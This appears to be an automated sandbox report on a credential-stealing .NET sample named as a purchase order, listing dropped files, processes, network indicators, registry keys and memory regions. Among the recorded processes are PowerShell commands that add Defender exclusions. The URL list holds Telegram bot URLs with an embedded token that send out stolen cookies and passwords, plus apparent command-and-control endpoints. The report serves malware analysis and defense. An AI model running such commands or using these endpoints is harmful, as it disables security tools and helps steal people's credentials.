Files
|
File Path
|
Type
|
Category
|
Malicious
|
|
|---|---|---|---|---|
|
BQ_PO#385995.exe
|
PE32+ executable (console) x86-64 Mono/.Net assembly, for MS Windows
|
initial sample
|
 |
|
|
C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_BQ_PO#385995.exe_6ccaa2afa6b5f377ea7f90a334b7f523bda1e5f6_45f15e28_b018de68-6682-4740-85dd-d222ff961ec2\Report.wer
|
Unicode text, UTF-16, little-endian text, with CRLF line terminators
|
dropped
|
|
|
|
C:\Users\user\AppData\Local\Temp\ubygsn.exe
|
PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
|
dropped
|
|
|
|
C:\ProgramData\Microsoft\Windows\WER\Temp\WER2620.tmp.dmp
|
Mini DuMP crash report, 16 streams, Thu Dec 5 13:01:11 2024, 0x1205a4 type
|
dropped
|
||
|
C:\ProgramData\Microsoft\Windows\WER\Temp\WER2CE7.tmp.WERInternalMetadata.xml
|
XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
|
dropped
|
||
|
C:\ProgramData\Microsoft\Windows\WER\Temp\WER2D65.tmp.xml
|
XML 1.0 document, ASCII text, with CRLF line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
|
data
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_4yzqir51.bji.ps1
|
ASCII text, with no line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_5kcpotrt.31e.ps1
|
ASCII text, with no line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ngbycr0o.lsg.psm1
|
ASCII text, with no line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_pta0rs1x.xhk.psm1
|
ASCII text, with no line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_tbiylfyx.ubh.ps1
|
ASCII text, with no line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ts45k1vt.poi.psm1
|
ASCII text, with no line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_xc0p0dyr.m2z.psm1
|
ASCII text, with no line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ymzxa5qn.kf3.ps1
|
ASCII text, with no line terminators
|
dropped
|
||
|
C:\Windows\appcompat\Programs\Amcache.hve
|
MS Windows registry file, NT/2000 or above
|
dropped
|
||
|
\Device\ConDrv
|
ASCII text, with CRLF line terminators
|
dropped
|
There are 7 hidden files, click here to show them.
Processes
|
Path
|
Cmdline
|
Malicious
|
|
|---|---|---|---|
|
C:\Users\user\Desktop\BQ_PO#385995.exe
|
"C:\Users\user\Desktop\BQ_PO#385995.exe"
|
|
|
|
C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
|
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\msbuild.exe"
|
|
|
|
C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
|
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\msbuild.exe"
|
|
|
|
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
|
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Windows\Microsoft.NET\Framework\v4.0.30319\msbuild.exe'
|
|
|
|
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
|
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'msbuild.exe'
|
|
|
|
C:\Users\user\AppData\Local\Temp\ubygsn.exe
|
"C:\Users\user\AppData\Local\Temp\ubygsn.exe"
|
|
|
|
C:\Windows\System32\conhost.exe
|
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
|
||
|
C:\Windows\System32\WerFault.exe
|
C:\Windows\system32\WerFault.exe -u -p 2244 -s 1048
|
||
|
C:\Windows\System32\conhost.exe
|
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
|
||
|
C:\Windows\System32\conhost.exe
|
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
|
URLs
|
Name
|
IP
|
Malicious
|
|
|---|---|---|---|
|
69.174.100.131
|
|
||
|
https://duckduckgo.com/chrome_newtab
|
unknown
|
||
|
https://duckduckgo.com/ac/?q=
|
unknown
|
||
|
https://api.telegram.org/bot7721085569:AAH1tkciy-nKykIEUNjOAUsItTcvNCVmFLo/sendDocument?chat_id=6236275763&caption=%20Pc%20Name:%20user%20%7C%20/%20VIP%20Recovery%20%5C%0D%0A%0D%0ACookies%20%7C%20user%20%7C%20VIP%20Recovery
|
149.154.167.220
|
||
|
https://api.telegram.org
|
unknown
|
||
|
https://api.telegram.org/bot
|
unknown
|
||
|
https://contoso.com/License
|
unknown
|
||
|
https://www.office.com/lB
|
unknown
|
||
|
https://system.data.sqlite.org/X
|
unknown
|
||
|
https://www.newtonsoft.com/json
|
unknown
|
||
|
https://reallyfreegeoip.org/xml/8.46.123.228$
|
unknown
|
||
|
https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
|
unknown
|
||
|
https://chrome.google.com/webstore?hl=en
|
unknown
|
||
|
http://varders.kozow.com:8081
|
unknown
|
||
|
https://urn.to/r/sds_seeaCould
|
unknown
|
||
|
https://api.telegram.org/bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:105270%0D%0ADate%20and%20Time:%2006/12/2024%20/%2010:34:50%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20105270%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D
|
149.154.167.220
|
||
|
https://api.telegram.org/bot7721085569:AAH1tkciy-nKykIEUNjOAUsItTcvNCVmFLo/sendDocument?chat_id=6236
|
unknown
|
||
|
http://checkip.dyndns.org/
|
158.101.44.242
|
||
|
https://aka.ms/pscore6lB
|
unknown
|
||
|
https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
|
unknown
|
||
|
http://checkip.dyndns.org/q
|
unknown
|
||
|
https://contoso.com/
|
unknown
|
||
|
https://nuget.org/nuget.exe
|
unknown
|
||
|
https://chrome.google.com/webstore?hl=enlB
|
unknown
|
||
|
https://api.telegram.org/bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:105270%0D%0ADate%20a
|
unknown
|
||
|
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
|
unknown
|
||
|
https://reallyfreegeoip.org/xml/8.46.123.228
|
104.21.67.152
|
||
|
https://api.telegram.org/bot7721085569:AAH1tkciy-nKykIEUNjOAUsItTcvNCVmFLo/sendDocument?chat_id=6236275763&caption=%20Pc%20Name:%20user%20%7C%20/%20VIP%20Recovery%20%5C%0D%0A%0D%0APW%20%7C%20user%20%7C%20VIP%20Recovery
|
149.154.167.220
|
||
|
https://reallyfreegeoip.org/xml/
|
unknown
|
||
|
https://www.office.com/
|
unknown
|
||
|
http://nuget.org/NuGet.exe
|
unknown
|
||
|
https://www.google.com/images/branding/product/ico/googleg_lodp.ico
|
unknown
|
||
|
http://pesterbdd.com/images/Pester.png
|
unknown
|
||
|
http://schemas.xmlsoap.org/soap/encoding/
|
unknown
|
||
|
http://www.apache.org/licenses/LICENSE-2.0.html
|
unknown
|
||
|
https://contoso.com/Icon
|
unknown
|
||
|
https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
|
unknown
|
||
|
http://upx.sf.net
|
unknown
|
||
|
http://checkip.dyndns.org
|
unknown
|
||
|
https://api.telegram.org/bot/sendMessage?chat_id=&text=
|
unknown
|
||
|
https://www.ecosia.org/newtab/
|
unknown
|
||
|
https://github.com/Pester/Pester
|
unknown
|
||
|
http://james.newtonking.com/projects/json
|
unknown
|
||
|
http://aborters.duckdns.org:8081
|
unknown
|
||
|
https://ac.ecosia.org/autocomplete?q=
|
unknown
|
||
|
http://51.38.247.67:8081/_send_.php?L
|
unknown
|
||
|
http://anotherarmy.dns.army:8081
|
unknown
|
||
|
http://schemas.xmlsoap.org/wsdl/
|
unknown
|
||
|
https://www.newtonsoft.com/jsonschema
|
unknown
|
||
|
http://crl.miUY:m
|
unknown
|
||
|
https://reallyfreegeoip.org
|
unknown
|
||
|
https://www.nuget.org/packages/Newtonsoft.Json.Bson
|
unknown
|
||
|
https://urn.to/r/sds_see
|
unknown
|
||
|
http://api.telegram.org
|
unknown
|
||
|
https://system.data.sqlite.org/
|
unknown
|
||
|
https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
|
unknown
|
||
|
http://51.38.247.67:8081/_send_.php?LCapplication/x-www-form-urlencoded
|
unknown
|
There are 47 hidden URLs, click here to show them.
Domains
|
Name
|
IP
|
Malicious
|
|
|---|---|---|---|
|
bg.microsoft.map.fastly.net
|
199.232.214.172
|
||
|
reallyfreegeoip.org
|
104.21.67.152
|
||
|
s-part-0035.t-0009.t-msedge.net
|
13.107.246.63
|
||
|
api.telegram.org
|
149.154.167.220
|
||
|
ax-0001.ax-msedge.net
|
150.171.28.10
|
||
|
fp2e7a.wpc.phicdn.net
|
192.229.221.95
|
||
|
checkip.dyndns.com
|
158.101.44.242
|
||
|
checkip.dyndns.org
|
unknown
|
||
|
tse1.mm.bing.net
|
unknown
|
IPs
|
IP
|
Domain
|
Country
|
Malicious
|
|
|---|---|---|---|---|
|
69.174.100.131
|
unknown
|
United States
|
|
|
|
149.154.167.220
|
api.telegram.org
|
United Kingdom
|
||
|
104.21.67.152
|
reallyfreegeoip.org
|
United States
|
||
|
158.101.44.242
|
checkip.dyndns.com
|
United States
|
Registry
|
Path
|
Value
|
Malicious
|
|
|---|---|---|---|
|
HKEY_CURRENT_USER\SOFTWARE\665C3A84D83DA1955753
|
97D084DBAF65E0395221928BE84907C5DFC51D8E0B9D8C8CAD659E49E821BD61
|
||
|
HKEY_CURRENT_USER\SOFTWARE\665C3A84D83DA1955753
|
97D084DBAF65E0395221928BE84907C5DFC51D8E0B9D8C8CAD659E49E821BD61
|
||
|
\REGISTRY\A\{d3254907-bfa3-7bc3-e0b9-8921003694a5}\Root\InventoryApplicationFile\bq_po#385995.exe|449bcfdda1cbc5ad
|
ProgramId
|
||
|
\REGISTRY\A\{d3254907-bfa3-7bc3-e0b9-8921003694a5}\Root\InventoryApplicationFile\bq_po#385995.exe|449bcfdda1cbc5ad
|
FileId
|
||
|
\REGISTRY\A\{d3254907-bfa3-7bc3-e0b9-8921003694a5}\Root\InventoryApplicationFile\bq_po#385995.exe|449bcfdda1cbc5ad
|
LowerCaseLongPath
|
||
|
\REGISTRY\A\{d3254907-bfa3-7bc3-e0b9-8921003694a5}\Root\InventoryApplicationFile\bq_po#385995.exe|449bcfdda1cbc5ad
|
LongPathHash
|
||
|
\REGISTRY\A\{d3254907-bfa3-7bc3-e0b9-8921003694a5}\Root\InventoryApplicationFile\bq_po#385995.exe|449bcfdda1cbc5ad
|
Name
|
||
|
\REGISTRY\A\{d3254907-bfa3-7bc3-e0b9-8921003694a5}\Root\InventoryApplicationFile\bq_po#385995.exe|449bcfdda1cbc5ad
|
OriginalFileName
|
||
|
\REGISTRY\A\{d3254907-bfa3-7bc3-e0b9-8921003694a5}\Root\InventoryApplicationFile\bq_po#385995.exe|449bcfdda1cbc5ad
|
Publisher
|
||
|
\REGISTRY\A\{d3254907-bfa3-7bc3-e0b9-8921003694a5}\Root\InventoryApplicationFile\bq_po#385995.exe|449bcfdda1cbc5ad
|
Version
|
||
|
\REGISTRY\A\{d3254907-bfa3-7bc3-e0b9-8921003694a5}\Root\InventoryApplicationFile\bq_po#385995.exe|449bcfdda1cbc5ad
|
BinFileVersion
|
||
|
\REGISTRY\A\{d3254907-bfa3-7bc3-e0b9-8921003694a5}\Root\InventoryApplicationFile\bq_po#385995.exe|449bcfdda1cbc5ad
|
BinaryType
|
||
|
\REGISTRY\A\{d3254907-bfa3-7bc3-e0b9-8921003694a5}\Root\InventoryApplicationFile\bq_po#385995.exe|449bcfdda1cbc5ad
|
ProductName
|
||
|
\REGISTRY\A\{d3254907-bfa3-7bc3-e0b9-8921003694a5}\Root\InventoryApplicationFile\bq_po#385995.exe|449bcfdda1cbc5ad
|
ProductVersion
|
||
|
\REGISTRY\A\{d3254907-bfa3-7bc3-e0b9-8921003694a5}\Root\InventoryApplicationFile\bq_po#385995.exe|449bcfdda1cbc5ad
|
LinkDate
|
||
|
\REGISTRY\A\{d3254907-bfa3-7bc3-e0b9-8921003694a5}\Root\InventoryApplicationFile\bq_po#385995.exe|449bcfdda1cbc5ad
|
BinProductVersion
|
||
|
\REGISTRY\A\{d3254907-bfa3-7bc3-e0b9-8921003694a5}\Root\InventoryApplicationFile\bq_po#385995.exe|449bcfdda1cbc5ad
|
AppxPackageFullName
|
||
|
\REGISTRY\A\{d3254907-bfa3-7bc3-e0b9-8921003694a5}\Root\InventoryApplicationFile\bq_po#385995.exe|449bcfdda1cbc5ad
|
AppxPackageRelativeId
|
||
|
\REGISTRY\A\{d3254907-bfa3-7bc3-e0b9-8921003694a5}\Root\InventoryApplicationFile\bq_po#385995.exe|449bcfdda1cbc5ad
|
Size
|
||
|
\REGISTRY\A\{d3254907-bfa3-7bc3-e0b9-8921003694a5}\Root\InventoryApplicationFile\bq_po#385995.exe|449bcfdda1cbc5ad
|
Language
|
||
|
\REGISTRY\A\{d3254907-bfa3-7bc3-e0b9-8921003694a5}\Root\InventoryApplicationFile\bq_po#385995.exe|449bcfdda1cbc5ad
|
Usn
|
||
|
HKEY_CURRENT_USER\SOFTWARE\Microsoft\IdentityCRL\Immersive\production\Token\{67082621-8D18-4333-9C64-10DE93676363}
|
DeviceTicket
|
||
|
HKEY_CURRENT_USER\SOFTWARE\Microsoft\IdentityCRL\Immersive\production\Token\{67082621-8D18-4333-9C64-10DE93676363}
|
DeviceId
|
||
|
HKEY_CURRENT_USER\SOFTWARE\Microsoft\IdentityCRL\Immersive\production\Token\{67082621-8D18-4333-9C64-10DE93676363}
|
ApplicationFlags
|
||
|
HKEY_CURRENT_USER\SOFTWARE\Microsoft\IdentityCRL\Immersive\production\Property
|
0018000DDABBE6B3
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing
|
EnableConsoleTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\ubygsn_RASAPI32
|
EnableFileTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\ubygsn_RASAPI32
|
EnableAutoFileTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\ubygsn_RASAPI32
|
EnableConsoleTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\ubygsn_RASAPI32
|
FileTracingMask
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\ubygsn_RASAPI32
|
ConsoleTracingMask
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\ubygsn_RASAPI32
|
MaxFileSize
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\ubygsn_RASAPI32
|
FileDirectory
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\ubygsn_RASMANCS
|
EnableFileTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\ubygsn_RASMANCS
|
EnableAutoFileTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\ubygsn_RASMANCS
|
EnableConsoleTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\ubygsn_RASMANCS
|
FileTracingMask
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\ubygsn_RASMANCS
|
ConsoleTracingMask
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\ubygsn_RASMANCS
|
MaxFileSize
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\ubygsn_RASMANCS
|
FileDirectory
|
There are 30 hidden registries, click here to show them.
Memdumps
|
Base Address
|
Regiontype
|
Protect
|
Malicious
|
|
|---|---|---|---|---|
|
982000
|
unkown
|
page readonly
|
|
|
|
441A000
|
trusted library allocation
|
page read and write
|
|
|
|
402000
|
remote allocation
|
page execute and read and write
|
|
|
|
4CD6000
|
trusted library allocation
|
page read and write
|
|
|
|
33C1000
|
trusted library allocation
|
page read and write
|
|
|
|
2DC1000
|
trusted library allocation
|
page read and write
|
|
|
|
7240000
|
trusted library section
|
page read and write
|
|
|
|
2760A47C000
|
trusted library allocation
|
page read and write
|
|
|
|
4876000
|
trusted library allocation
|
page read and write
|
|
|
|
2760A756000
|
trusted library allocation
|
page read and write
|
|
|
|
2FB4000
|
trusted library allocation
|
page read and write
|
|
|
|
407E000
|
trusted library allocation
|
page read and write
|
||
|
4A72000
|
trusted library allocation
|
page read and write
|
||
|
FB0000
|
trusted library allocation
|
page read and write
|
||
|
2D80000
|
trusted library allocation
|
page read and write
|
||
|
6199000
|
stack
|
page read and write
|
||
|
517D000
|
trusted library allocation
|
page read and write
|
||
|
6B88000
|
trusted library allocation
|
page read and write
|
||
|
8192000
|
heap
|
page read and write
|
||
|
6DAD000
|
stack
|
page read and write
|
||
|
8CEF000
|
stack
|
page read and write
|
||
|
276086A0000
|
heap
|
page read and write
|
||
|
31C0000
|
heap
|
page execute and read and write
|
||
|
790E000
|
stack
|
page read and write
|
||
|
6246000
|
heap
|
page read and write
|
||
|
5F5E000
|
stack
|
page read and write
|
||
|
FF0000
|
trusted library allocation
|
page read and write
|
||
|
875E000
|
stack
|
page read and write
|
||
|
3150000
|
trusted library allocation
|
page read and write
|
||
|
4B70000
|
heap
|
page read and write
|
||
|
13FE000
|
trusted library allocation
|
page read and write
|
||
|
72DD000
|
stack
|
page read and write
|
||
|
318C000
|
stack
|
page read and write
|
||
|
B59E5FF000
|
stack
|
page read and write
|
||
|
128B000
|
stack
|
page read and write
|
||
|
276087E0000
|
heap
|
page read and write
|
||
|
53D0000
|
trusted library allocation
|
page read and write
|
||
|
58B4000
|
trusted library allocation
|
page read and write
|
||
|
2F7E000
|
trusted library allocation
|
page read and write
|
||
|
684C000
|
stack
|
page read and write
|
||
|
696A000
|
trusted library allocation
|
page read and write
|
||
|
EF0000
|
trusted library allocation
|
page read and write
|
||
|
7FFD34510000
|
trusted library allocation
|
page read and write
|
||
|
77B0000
|
trusted library allocation
|
page read and write
|
||
|
30CE000
|
stack
|
page read and write
|
||
|
AE9000
|
heap
|
page read and write
|
||
|
2CE9000
|
trusted library allocation
|
page read and write
|
||
|
2DC8000
|
trusted library allocation
|
page read and write
|
||
|
69B0000
|
trusted library allocation
|
page read and write
|
||
|
27608930000
|
trusted library allocation
|
page read and write
|
||
|
30C0000
|
trusted library allocation
|
page read and write
|
||
|
33FC000
|
heap
|
page read and write
|
||
|
7B20000
|
trusted library allocation
|
page read and write
|
||
|
701E000
|
stack
|
page read and write
|
||
|
335A000
|
trusted library allocation
|
page execute and read and write
|
||
|
13FB000
|
trusted library allocation
|
page read and write
|
||
|
2E7F000
|
trusted library allocation
|
page read and write
|
||
|
6970000
|
trusted library allocation
|
page read and write
|
||
|
86E0000
|
heap
|
page read and write
|
||
|
FA3000
|
trusted library allocation
|
page execute and read and write
|
||
|
6FBE000
|
stack
|
page read and write
|
||
|
276087EC000
|
heap
|
page read and write
|
||
|
31B0000
|
heap
|
page read and write
|
||
|
30AA000
|
trusted library allocation
|
page read and write
|
||
|
31D8000
|
trusted library allocation
|
page read and write
|
||
|
5BE8000
|
trusted library allocation
|
page read and write
|
||
|
27622BD0000
|
heap
|
page execute and read and write
|
||
|
73D0000
|
trusted library allocation
|
page read and write
|
||
|
7B00000
|
trusted library allocation
|
page read and write
|
||
|
6A96000
|
trusted library allocation
|
page read and write
|
||
|
2760A3F0000
|
heap
|
page execute and read and write
|
||
|
C59000
|
stack
|
page read and write
|
||
|
5CDE000
|
stack
|
page read and write
|
||
|
6DAE000
|
trusted library allocation
|
page read and write
|
||
|
BFC000
|
stack
|
page read and write
|
||
|
DC0000
|
heap
|
page read and write
|
||
|
2E77000
|
trusted library allocation
|
page read and write
|
||
|
6FEF000
|
stack
|
page read and write
|
||
|
802E000
|
stack
|
page read and write
|
||
|
8102000
|
trusted library allocation
|
page read and write
|
||
|
15A9000
|
heap
|
page read and write
|
||
|
19A6000
|
heap
|
page read and write
|
||
|
7EF50000
|
trusted library allocation
|
page execute and read and write
|
||
|
81C1000
|
heap
|
page read and write
|
||
|
3180000
|
trusted library allocation
|
page read and write
|
||
|
1050000
|
trusted library allocation
|
page read and write
|
||
|
27608943000
|
trusted library allocation
|
page read and write
|
||
|
766E000
|
stack
|
page read and write
|
||
|
897C000
|
stack
|
page read and write
|
||
|
1917000
|
trusted library allocation
|
page execute and read and write
|
||
|
762E000
|
stack
|
page read and write
|
||
|
3DCF000
|
trusted library allocation
|
page read and write
|
||
|
10A5000
|
heap
|
page read and write
|
||
|
746B000
|
stack
|
page read and write
|
||
|
4070000
|
trusted library allocation
|
page read and write
|
||
|
3EA6000
|
trusted library allocation
|
page read and write
|
||
|
6D70000
|
trusted library allocation
|
page read and write
|
||
|
8B03000
|
trusted library allocation
|
page read and write
|
||
|
7FFD34500000
|
trusted library allocation
|
page read and write
|
||
|
33BE000
|
stack
|
page read and write
|
||
|
73CE000
|
stack
|
page read and write
|
||
|
1411000
|
trusted library allocation
|
page read and write
|
||
|
1010000
|
trusted library allocation
|
page execute and read and write
|
||
|
715F000
|
heap
|
page read and write
|
||
|
1410000
|
heap
|
page read and write
|
||
|
8627000
|
trusted library allocation
|
page read and write
|
||
|
713B000
|
heap
|
page read and write
|
||
|
160F000
|
heap
|
page read and write
|
||
|
314E000
|
trusted library allocation
|
page read and write
|
||
|
302A000
|
trusted library allocation
|
page read and write
|
||
|
2D00000
|
trusted library allocation
|
page read and write
|
||
|
6FAE000
|
stack
|
page read and write
|
||
|
7169000
|
heap
|
page read and write
|
||
|
4401000
|
trusted library allocation
|
page read and write
|
||
|
18AE000
|
stack
|
page read and write
|
||
|
A5F000
|
stack
|
page read and write
|
||
|
107E000
|
heap
|
page read and write
|
||
|
2F76000
|
trusted library allocation
|
page read and write
|
||
|
7F60000
|
trusted library allocation
|
page execute and read and write
|
||
|
713E000
|
stack
|
page read and write
|
||
|
516D000
|
trusted library allocation
|
page read and write
|
||
|
7100000
|
heap
|
page execute and read and write
|
||
|
7B10000
|
trusted library allocation
|
page read and write
|
||
|
FD7000
|
trusted library allocation
|
page execute and read and write
|
||
|
7F280000
|
trusted library allocation
|
page execute and read and write
|
||
|
69F0000
|
trusted library allocation
|
page execute and read and write
|
||
|
18E0000
|
trusted library allocation
|
page read and write
|
||
|
3350000
|
trusted library allocation
|
page read and write
|
||
|
714F000
|
heap
|
page read and write
|
||
|
81B9000
|
heap
|
page read and write
|
||
|
306D000
|
trusted library allocation
|
page read and write
|
||
|
77D0000
|
heap
|
page read and write
|
||
|
F60000
|
heap
|
page read and write
|
||
|
7FFD34570000
|
trusted library allocation
|
page read and write
|
||
|
2760A4E3000
|
trusted library allocation
|
page read and write
|
||
|
276087A0000
|
heap
|
page read and write
|
||
|
8150000
|
heap
|
page read and write
|
||
|
319D000
|
trusted library allocation
|
page execute and read and write
|
||
|
C6D000
|
trusted library allocation
|
page execute and read and write
|
||
|
81E4000
|
heap
|
page read and write
|
||
|
7842000
|
heap
|
page read and write
|
||
|
3EB5000
|
trusted library allocation
|
page read and write
|
||
|
7FFD3440C000
|
trusted library allocation
|
page execute and read and write
|
||
|
5536000
|
trusted library allocation
|
page read and write
|
||
|
86D0000
|
heap
|
page read and write
|
||
|
7187000
|
heap
|
page read and write
|
||
|
854E000
|
stack
|
page read and write
|
||
|
2CF0000
|
trusted library allocation
|
page read and write
|
||
|
3194000
|
trusted library allocation
|
page read and write
|
||
|
893E000
|
stack
|
page read and write
|
||
|
2760A401000
|
trusted library allocation
|
page read and write
|
||
|
661D000
|
stack
|
page read and write
|
||
|
665F000
|
stack
|
page read and write
|
||
|
1097000
|
heap
|
page read and write
|
||
|
81CC000
|
heap
|
page read and write
|
||
|
13AE000
|
stack
|
page read and write
|
||
|
8600000
|
trusted library allocation
|
page read and write
|
||
|
FF7C0000
|
trusted library allocation
|
page execute and read and write
|
||
|
2DB0000
|
heap
|
page execute and read and write
|
||
|
12F0000
|
heap
|
page read and write
|
||
|
794E000
|
stack
|
page read and write
|
||
|
7FFD34400000
|
trusted library allocation
|
page read and write
|
||
|
8699000
|
stack
|
page read and write
|
||
|
415B000
|
trusted library allocation
|
page read and write
|
||
|
12AF000
|
unkown
|
page read and write
|
||
|
1000000
|
heap
|
page read and write
|
||
|
58D4000
|
trusted library allocation
|
page read and write
|
||
|
3042000
|
trusted library allocation
|
page read and write
|
||
|
15F9000
|
heap
|
page read and write
|
||
|
75AE000
|
stack
|
page read and write
|
||
|
2E07000
|
heap
|
page read and write
|
||
|
7150000
|
heap
|
page execute and read and write
|
||
|
87A0000
|
heap
|
page read and write
|
||
|
8794000
|
heap
|
page read and write
|
||
|
525E000
|
stack
|
page read and write
|
||
|
8120000
|
trusted library allocation
|
page execute and read and write
|
||
|
2E36000
|
trusted library allocation
|
page read and write
|
||
|
71CA000
|
heap
|
page read and write
|
||
|
D57000
|
stack
|
page read and write
|
||
|
10B3000
|
heap
|
page read and write
|
||
|
2E1C000
|
trusted library allocation
|
page read and write
|
||
|
3024000
|
trusted library allocation
|
page read and write
|
||
|
84C3000
|
trusted library allocation
|
page read and write
|
||
|
719D000
|
stack
|
page read and write
|
||
|
4717000
|
heap
|
page read and write
|
||
|
3FFB000
|
trusted library allocation
|
page read and write
|
||
|
5749000
|
trusted library allocation
|
page read and write
|
||
|
755A000
|
stack
|
page read and write
|
||
|
7157000
|
heap
|
page read and write
|
||
|
7209000
|
heap
|
page read and write
|
||
|
7510000
|
trusted library allocation
|
page read and write
|
||
|
729E000
|
stack
|
page read and write
|
||
|
276089B5000
|
heap
|
page read and write
|
||
|
1906000
|
trusted library allocation
|
page execute and read and write
|
||
|
153F000
|
heap
|
page read and write
|
||
|
315B000
|
trusted library allocation
|
page read and write
|
||
|
18ED000
|
trusted library allocation
|
page execute and read and write
|
||
|
8712000
|
heap
|
page read and write
|
||
|
4710000
|
heap
|
page read and write
|
||
|
6D6A000
|
stack
|
page read and write
|
||
|
317F000
|
trusted library allocation
|
page read and write
|
||
|
702D000
|
stack
|
page read and write
|
||
|
45EC000
|
stack
|
page read and write
|
||
|
4D80000
|
trusted library allocation
|
page read and write
|
||
|
400000
|
remote allocation
|
page execute and read and write
|
||
|
8211000
|
heap
|
page read and write
|
||
|
2D6E000
|
stack
|
page read and write
|
||
|
7884000
|
heap
|
page read and write
|
||
|
276089B0000
|
heap
|
page read and write
|
||
|
2761A407000
|
trusted library allocation
|
page read and write
|
||
|
7330000
|
trusted library section
|
page read and write
|
||
|
3034000
|
trusted library allocation
|
page read and write
|
||
|
7692000
|
heap
|
page read and write
|
||
|
61B2000
|
heap
|
page read and write
|
||
|
3E8E000
|
trusted library allocation
|
page read and write
|
||
|
725E000
|
stack
|
page read and write
|
||
|
8C69000
|
stack
|
page read and write
|
||
|
310E000
|
stack
|
page read and write
|
||
|
7139000
|
heap
|
page read and write
|
||
|
1597000
|
heap
|
page read and write
|
||
|
7FFD34360000
|
trusted library allocation
|
page read and write
|
||
|
6B1C000
|
stack
|
page read and write
|
||
|
7FFD34550000
|
trusted library allocation
|
page execute and read and write
|
||
|
871F000
|
stack
|
page read and write
|
||
|
5721000
|
trusted library allocation
|
page read and write
|
||
|
7AA0000
|
trusted library allocation
|
page read and write
|
||
|
7162000
|
heap
|
page read and write
|
||
|
7110000
|
heap
|
page read and write
|
||
|
6D2D000
|
trusted library allocation
|
page read and write
|
||
|
2CDE000
|
stack
|
page read and write
|
||
|
18D0000
|
trusted library allocation
|
page read and write
|
||
|
30C3000
|
trusted library allocation
|
page read and write
|
||
|
6D10000
|
trusted library allocation
|
page read and write
|
||
|
8350000
|
trusted library allocation
|
page read and write
|
||
|
6DA0000
|
trusted library allocation
|
page read and write
|
||
|
3F17000
|
trusted library allocation
|
page read and write
|
||
|
4B60000
|
trusted library allocation
|
page read and write
|
||
|
8B7E000
|
stack
|
page read and write
|
||
|
821A000
|
heap
|
page read and write
|
||
|
2E3A000
|
trusted library allocation
|
page read and write
|
||
|
6BDC000
|
stack
|
page read and write
|
||
|
7FFD3437B000
|
trusted library allocation
|
page execute and read and write
|
||
|
307E000
|
stack
|
page read and write
|
||
|
86E4000
|
heap
|
page read and write
|
||
|
C50000
|
trusted library allocation
|
page read and write
|
||
|
63A0000
|
heap
|
page read and write
|
||
|
3080000
|
heap
|
page read and write
|
||
|
4781000
|
trusted library allocation
|
page read and write
|
||
|
32B0000
|
heap
|
page read and write
|
||
|
50EC000
|
trusted library allocation
|
page read and write
|
||
|
685E000
|
stack
|
page read and write
|
||
|
8620000
|
trusted library allocation
|
page read and write
|
||
|
46B0000
|
heap
|
page execute and read and write
|
||
|
8680000
|
trusted library allocation
